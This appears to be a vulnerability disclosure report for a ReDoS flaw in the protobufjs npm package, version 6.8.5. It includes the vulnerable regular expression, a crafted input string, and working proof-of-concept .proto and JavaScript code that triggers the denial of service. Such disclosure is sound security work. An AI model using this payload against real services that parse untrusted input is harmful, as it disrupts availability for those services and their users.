I would like to report a ReDoS in protobufjs
It allows to cause Denial of Service by trying to parse (or load) a crafted *.proto
file.
module name: protobufjsversion:6.8.5npm page: https://www.npmjs.com/package/[MODULE NAME]
> Protocol Buffers are a language-neutral, platform-neutral, extensible way of serializing structured data for use in communications protocols, data storage, and more, originally designed at Google (see).
-22 592 downloads in the last day
352 974 downloads in the last week
1 321 151 downloads in the last month
~15 853 812 estimated downloads per year
ReDoS.
/^(?:\.?[a-zA-Z_][a-zA-Z_0-9]*)+$/
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx!
proto file:
// awesome.proto
package awesomepackage;
syntax = "proto3";
message AwesomeMessage {
option (my_option) = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx!;
}
js file:
require('protobufjs').load("./awesome.proto", () => {});
or, just with parse
:
require('protobufjs').parse(`
package awesomepackage;
syntax = "proto3";
message AwesomeMessage {
option (my_option) = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx!;
}
`, () => {});
Cause denial of service by parsing a crafted *.proto file.